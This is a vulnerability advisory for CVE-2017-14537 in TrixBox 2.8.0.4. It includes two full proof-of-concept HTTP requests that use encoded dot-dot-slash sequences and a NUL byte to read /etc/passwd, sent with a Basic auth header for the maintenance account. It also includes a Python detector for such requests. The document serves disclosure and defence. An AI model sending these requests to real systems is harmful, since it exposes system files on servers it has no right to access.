TrixBox Multiple Path Traversal Vulnerabilities [CVE-2017-14537]

@tiger_tigerboy

Title: TrixBox Multiple Path Traversal Vulnerabilities

Affected Product: trixbox-2.8.0.4

Product Page: https://sourceforge.net/projects/asteriskathome/

CVSSv2: (AV:N/AC:M/Au:S/C:C/I:N/A:N)   Severity: Medium

Solution Status: N/A

Credit: Sachin Wagh (@tiger_tigerboy)


Description:

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. (Source: OWASP).

Impact:

Remote attackers may use a specially crafted request with directory-traversal sequences (‘../’) to retrieve sensitive information.

Proof-of-Concept:

  • Affected Request -1:
POST /maint/index.php?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST http://192.168.0.6/maint/index.php?packages HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.6/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive

xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages

 


Fig-1: Path Traversal Vulnerability

  • Affected Request -2:
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1


Fig-2: Path Traversal Vulnerability
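
With Solution Status listed as N/A, detection at the web server or proxy is the practical control. The following is an added example, not part of the original advisory or of TrixBox: a check that flags requests shaped like the two above. The function names and the WATCHED table are assumptions built from the paths and parameters shown in those requests.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: only the two endpoints/parameters shown in this advisory are watched.
WATCHED = {
    "/maint/index.php": {"xajaxargs[]"},
    "/maint/modules/home/index.php": {"lang"},
}
# ".." as a whole path component, with either slash style.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def fully_decode(value, rounds=5):
    """Percent-decode repeatedly so nested encoding is normalised before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def findings(value):
    """Return the reasons a parameter value looks like a path escape."""
    v = fully_decode(value)
    reasons = []
    if TRAVERSAL.search(v):
        reasons.append("dot-dot-slash")
    if "\x00" in v:
        reasons.append("nul-byte")  # e.g. the %00 suffix cut-off in request 2
    if v.startswith(("/", "\\")):
        reasons.append("absolute-path")
    return reasons


def inspect(method, target, body=""):
    """Check one request; returns a list of (parameter, reasons) for watched fields."""
    url = urlsplit(target)
    watched = WATCHED.get(url.path)
    if not watched:
        return []
    pairs = parse_qsl(url.query, keep_blank_values=True)
    if method == "POST":
        pairs += parse_qsl(body, keep_blank_values=True)
    checked = [(name, findings(value)) for name, value in pairs if name in watched]
    return [(name, reasons) for name, reasons in checked if reasons]
```

Feed it the method, request target and (for POST) the form body from access or proxy logs; an empty list means nothing suspicious was found in the watched parameters.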


Credit:

Sachin Wagh (@tiger_tigerboy)
